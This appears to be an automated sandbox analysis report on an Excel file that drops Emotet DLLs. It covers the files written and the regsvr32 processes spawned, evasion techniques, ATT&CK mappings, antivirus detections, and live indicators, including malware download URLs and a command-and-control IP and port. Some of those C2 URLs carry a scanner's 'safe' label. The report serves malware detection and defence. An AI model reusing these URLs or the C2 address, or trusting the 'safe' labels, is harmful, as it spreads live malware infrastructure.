                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
                      Source: T35PENELLOsp[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5caa2
                      Source: Jf8[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5ef33
                      Source: uxevr1.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5ef33
                      Source: 1Cb5zOjLgWGDemz55C5[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x64194
                      Source: uxevr3.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x64194
                      Source: uxevr2.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x644de
                      Source: 4HWP0KQI[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x644de
                      Source: uxevr4.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5caa2
                      Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
                      Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
                      Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
                      Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
                      Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx

                      Boot Survival

                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\FiPeSYwmr\Wuiko.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exe TID: 1468 Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2588 Thread sleep time: -300000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 1292 Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2960 Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 464 Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 900 Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 1268 Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2224 Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_3-16379
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
                      Source: C:\Windows\System32\regsvr32.exe API coverage: 8.6 %
                      Source: C:\Windows\System32\regsvr32.exe API coverage: 7.7 %
                      Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation
                      Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose
                      Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose
                      Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose
                      Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose
                      Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node graph_3-16381
                      Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node graph_3-16530
                      Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 0000000A.00000002.950666041.0000000000228000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RomNECVMWar_VMware_SATA_CD01_______________1.00___
                      Source: regsvr32.exe, 00000008.00000002.943436564.000000000038A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,3_2_000007FEF9D30215
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000007FEF9D2BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF7533280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000007FEF7533280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF753BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000007FEF753BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000007FEF74D3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000007FEF74D3280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000007FEF74DBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000007FEF74DBE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000007FEF70CBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000007FEF70CBE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000007FEF70C3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_000007FEF70C3280

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\regsvr32.exe | Network Connect: 165.22.73.229 8080
                      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"
                      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll"
                      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll"
                      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll"
                      Source: C:\Windows\System32\regsvr32.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 10.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.regsvr32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.regsvr32.exe.3e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.regsvr32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.regsvr32.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.regsvr32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.regsvr32.exe.300000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.regsvr32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.regsvr32.exe.2d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000B.00000002.1219777301.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.1218923490.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.935437838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.950850615.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.935123835.00000000003E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.944087304.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.1219645231.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1218912030.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1218942103.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.951348566.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.926422500.0000000000300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.943168453.00000000002D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.1218930467.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1219706572.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Scripting (2) | Path Interception | Process Injection (111) | Masquerading (131) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API (2) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools (1) | LSASS Memory | Query Registry (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Exploitation for Client Execution (43) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (1) | Security Account Manager | Security Software Discovery (121) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer (13) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (111) | NTDS | Virtualization/Sandbox Evasion (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol (2) | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Process Discovery (2) | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol (22) | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting (2) | Cached Domain Credentials | Remote System Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Hidden Files and Directories (1) | DCSync | File and Directory Discovery (2) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information (2) | Proc Filesystem | System Information Discovery (16) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Regsvr32 (1) | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      [Behavior graph omitted. Behavior Graph ID: 632071; Sample: DETAILS 25922194612.xls; Startdate: 23/05/2022; Architecture: WINDOWS; Score: 100]

                      Source | Detection | Scanner | Label
                      DETAILS 25922194612.xls | 41% | ReversingLabs | Document-Excel.Trojan.Abracadabra

                      Source | Detection | Scanner | Label
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll | 100% | Joe Sandbox ML |
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll | 100% | Joe Sandbox ML |
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll | 100% | Joe Sandbox ML |
                      C:\Users\user\uxevr3.ocx | 100% | Joe Sandbox ML |
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll | 100% | Joe Sandbox ML |
                      C:\Users\user\uxevr1.ocx | 100% | Joe Sandbox ML |
                      C:\Users\user\uxevr4.ocx | 100% | Joe Sandbox ML |
                      C:\Users\user\uxevr2.ocx | 100% | Joe Sandbox ML |
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll | 59% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll | 29% | Metadefender |
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll | 61% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll | 59% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll | 59% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Users\user\uxevr1.ocx | 59% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Users\user\uxevr2.ocx | 59% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Users\user\uxevr3.ocx | 59% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Users\user\uxevr4.ocx | 29% | Metadefender |
                      C:\Users\user\uxevr4.ocx | 61% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy) | 59% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy) | 59% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy) | 59% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy) | 29% | Metadefender |
                      C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy) | 61% | ReversingLabs | Win64.Trojan.Emotet

                      Source | Detection | Scanner | Label
                      3.2.regsvr32.exe.300000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      11.2.regsvr32.exe.220000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      10.2.regsvr32.exe.2c0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      7.2.regsvr32.exe.2c0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      8.2.regsvr32.exe.2d0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      9.2.regsvr32.exe.150000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      4.2.regsvr32.exe.1d0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      5.2.regsvr32.exe.3e0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461

                      Source | Detection | Scanner | Label
                      kolejleri.com | 12% | Virustotal |
                      milanstaffing.com | 7% | Virustotal |
                      learnviaonline.com | 9% | Virustotal |
                      stainedglassexpress.com | 5% | Virustotal |

                      Source | Detection | Scanner | Label
                      http://learnviaonline.com/wp-admin/qGb/ | 100% | Avira URL Cloud | malware
                      https://165.22.73.229:8080/.t | 0% | Avira URL Cloud | safe
                      https://165.22.73.229:8080/L | 0% | Avira URL Cloud | safe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
                      http://milanstaffing.com/images/D4TRnDubF/ | 100% | Avira URL Cloud | malware
                      https://165.22.73.229:8080/h | 0% | Avira URL Cloud | safe
                      https://165.22.73.229/l | 0% | Avira URL Cloud | safe
                      http://kolejleri.com/wp-admin/REvup/ | 100% | Avira URL Cloud | malware
                      http://ocsp.entrust.net03 | 0% | URL Reputation | safe
                      https://165.22.73.229:8080/ | 0% | Avira URL Cloud | safe
                      https://165.22.73.229/ | 0% | Avira URL Cloud | safe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
                      https://165.22.73.229/5v | 0% | Avira URL Cloud | safe
                      http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
                      https://165.22.73.229/KP | 0% | Avira URL Cloud | safe
                      http://ocsp.entrust.net0D | 0% | URL Reputation | safe
                      https://165.22.73.229/=v | 0% | Avira URL Cloud | safe
                      https://165.22.73.229:8080/1o | 0% | Avira URL Cloud | safe

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      kolejleri.com | 85.114.142.153 | true | true | | unknown
                      milanstaffing.com | 107.189.3.39 | true | false | | unknown
                      learnviaonline.com | 103.171.181.223 | true | false | | unknown
                      stainedglassexpress.com | 66.71.247.68 | true | false | | unknown
                      windowsupdatebg.s.llnwi.net | 95.140.230.192 | true | false | | unknown

                      Name | Malicious | Antivirus Detection | Reputation
                      http://learnviaonline.com/wp-admin/qGb/ | true | Avira URL Cloud: malware | unknown
                      http://milanstaffing.com/images/D4TRnDubF/ | true | Avira URL Cloud: malware | unknown
                      http://kolejleri.com/wp-admin/REvup/ | true | Avira URL Cloud: malware | unknown

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      https://165.22.73.229:8080/.t | regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://165.22.73.229:8080/L | regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://165.22.73.229:8080/h | regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://crl.entrust.net/server1.crl0 | regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      https://165.22.73.229/l | regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://ocsp.entrust.net03 | regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://165.22.73.229:8080/ | regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://165.22.73.229/ | regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
